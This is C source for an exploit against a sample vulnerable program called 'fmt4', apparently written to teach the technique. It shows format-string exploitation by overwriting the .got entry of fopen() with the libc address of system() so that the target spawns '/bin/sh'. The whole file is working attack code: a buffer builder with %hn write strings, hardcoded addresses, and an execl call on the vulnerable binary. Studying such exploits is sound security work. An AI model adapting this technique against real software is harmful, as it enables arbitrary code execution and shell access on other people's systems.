/*
 * $Id: fmt4-ex.c,v 1.1.1.1 2004/05/29 14:15:04 raptor Exp $
 *
 * fmt4-ex.c - fmt4.c exploit (format string exploitation)
 * Copyright (c) 2003 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit demonstrates the .got entry substitution technique against a
 * typical format string vulnerability. We change the .got entry of fopen()
 * with the system() address in libc. Tested on Linux/Owl with gcc-2.95.3.
 *
 * Malicious buffer structure:
 * [SHELL] [address part w/o dummies] [special write string]
 * 
 * Usage: ./fmt4-ex <offset to first address>
 *
 * $ ./fmt4-ex 
 * Using fopen() address in .got   : 0x8049578
 * Using system() address in libc  : 0x1738f0
 * Using format string     : /bin/sh;exit   ;xz%.14552u%11$hn%.50983u%12$hn
 * [...]
 * sh-2.05$ 
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define	VULN	"./fmt4"		// this is the vulnerable program
#define BUF	1024			// max size of the malicious buffer
#define	FOPEN	0x08049578		// address of fopen() entry in .got
#define SYSTEM	0x1738f0		// see libc-search.c at 0xdeadbeef.info
#define	OFFSET	11			// offset to first address on stack
#define	SHELL	"/bin/sh;exit   ;"	// executed by our system() function

/* split an address in 2 words */
#define SPLITW( w1, w2, addr ) {	\
	w1 = (addr & 0x0000ffff);	\
	w2 = (addr & 0xffff0000) >> 16;	\
}

int main(int argc, char **argv)
{
	char 	buf[BUF];
	int 	n1, n2, offset = OFFSET;
	int 	ret1, ret2;

	char 	*p = buf;

	/* check command line for offset */
	if (argc > 1)
		offset = atoi(argv[1]);

	/* split the ret address in 2 words */
	SPLITW(ret1, ret2, SYSTEM);

	/* initialize the malicious buffer */
	bzero(buf, BUF);

	/* copy SHELL at the beginning */
	strcpy(p, SHELL);
	p += sizeof(SHELL) - 1;

	/* address part of the format string */
	*((void **)p) = (void *)(FOPEN);
	p += 4;
	*((void **)p) = (void *)(FOPEN + 2);
	p += 4;

	/* calculate numeric arguments for the write string */
	n1 = (ret1 - strlen(buf))		% 0x10000;
	n2 = (ret2 - strlen(buf) - n1) 		% 0x10000;

	/* check for potentially dangerous numeric arguments below 10 */
	n1 += (n1 < 10) ? (0x10000) : (0);
	n2 += (n2 < 10) ? (0x10000) : (0);

	/* build the write string part of the format string */
	sprintf(p, "%%.%du%%%d$hn%%.%du%%%d$hn", n1, offset, n2, offset + 1);

	/* print some output */
	fprintf(stderr, "Using fopen() address in .got\t: %p\n", FOPEN);
	fprintf(stderr, "Using system() address in libc\t: %p\n", SYSTEM);
	fprintf(stderr, "Using format string\t: %s\n\n", buf);

	/* run the vulnerable program */
	execl(VULN, VULN + 2, buf, NULL);
	perror("execl");
}
